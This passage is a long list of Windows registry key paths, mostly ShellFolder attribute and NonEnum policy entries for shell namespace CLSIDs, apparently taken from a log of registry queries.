HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{26EE0668-A00A-44D7-9371-BEB064C98683}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{031E4825-7B94-4DC3-B131-E946B44C8DD5}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{04731B67-D933-450A-90E6-4ACD2E9408FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{11016101-E366-4D22-BC06-4ADA335C892B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsFORDISPLAY
